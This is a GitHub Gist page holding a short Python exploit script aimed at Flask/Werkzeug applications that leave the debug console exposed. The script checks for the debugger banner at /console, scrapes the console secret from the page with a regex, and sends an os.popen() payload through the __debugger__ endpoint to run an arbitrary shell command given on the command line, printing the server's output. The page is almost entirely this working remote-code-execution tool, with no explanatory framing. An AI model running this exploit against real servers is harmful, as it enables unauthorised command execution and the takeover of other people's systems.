Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import requests
import sys
import re
import urllib,bs4
response = requests.get('%s/console' % (sys.argv[1]))
if "Werkzeug powered traceback interpreter" not in response.text:
print("[-] Debug is not enabled")
sys.exit(-1)
cmd = '''__import__('os').popen(\'%s\').read();''' % (sys.argv[2])
response = requests.get('%s/console' % (sys.argv[1]))
secret = re.findall("[0-9a-zA-Z]{20}",response.text)
if len(secret) != 1:
print("[-] Couldn't get the SECRET")
sys.exit(-1)
else:
secret = secret[0]
print("[+] SECRET is: "+str(secret))
print("[+] Script will try executing %s on %s" % (sys.argv[2],sys.argv[1]))
response = requests.get("%s/console?__debugger__=yes&cmd=%s&frm=0&s=%s" % (sys.argv[1],str(cmd),secret))
print("[+] response from server")
soup = bs4.BeautifulSoup(response.text,"lxml")
resp = soup.getText().split('\n')[1]
print("\r\n".join(resp.split('\\n')))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment